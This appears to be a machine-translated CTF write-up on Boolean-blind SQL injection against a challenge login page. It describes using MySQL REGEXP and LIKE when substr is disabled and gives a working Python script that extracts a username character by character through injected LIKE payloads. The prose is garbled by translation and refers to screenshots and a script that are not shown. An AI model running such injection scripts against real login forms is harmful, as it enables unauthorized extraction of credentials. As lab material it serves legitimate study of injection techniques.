Preface:
Before Boolean blinds are carried out in the normal injection, this time to do a Boolean blind subject, learned a lot of knowledge and record it.
0x00: regexp Regular Expressions injection
Tests found username=1' or 1=1#echo when the wrong password, the password test around the past, try using Boolean blinds
did not respond, indicating that it should be substrthe function is disabled, then how to guess, before the interception methods are then judged by this function, Since it means to be disabled, there are other functions can guess, thorough investigation to find out:
MySQL also supports other regular expression matching, MySQL REGEXP operator used to perform regular expression matching
Try it regexpand see whether you can use, use blasting to see if there will be a password error , if there is then the use of this function is:
Generate a dictionary to run it:
blasting found that there are really two different lengths
so this function can be used, and user () is the first character is indeed u or U, the final burst is user
then the database can also burst out, but here, test it, order、selectand other functions are disabled, so also do the following to test, even if the database is no way to come to the next step, to look at the page source code here, found:
field corresponding account password that is not right ? Directly through here you can continue to guess:
blasting out of a character will be added to the list continue blasting, blasting a password just to change the field to landing is carried git leak, do not write back.
Script is as follows:
0x01: SQL LIKE operator injection
Seen before the chef WP, also tried this like the operator, they also give it a try
are carried out to see if they match the corresponding values in the field to try:
found to be possible, it would change my script above payload can:
import string
import requests
url = 'http://6cb7a820708242519c095809f4e3a7469f362925822e434d.changame.ichunqiu.com/Challenges/login.php'
headers = {'User-Agent': "Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0"}
#ascii_letters生成所有字母,digits生成所有数字0-9
payloads = string.ascii_letters + string.digits
temp = ''
for i in range(40):
#爆破用户名或密码
print("username:")
for p in payloads:
payload = temp + p
#判断p3ss_w0rd字段中是否存在payload中所包含的字符
#LIKE 操作符用于在 WHERE 子句中搜索列中的指定模式
name = "admin' or user_n3me like '{}%' ;#".format(payload)
data = dict(username=name, passwrod='test')
res = requests.post(url, headers=headers, data=data)
if (len(res.content) == 12):
temp = temp + p
#ljust() 方法返回一个原字符串左对齐,并使用空格填充至指定长度的新字符串
print(temp.ljust(40, '.'))
break
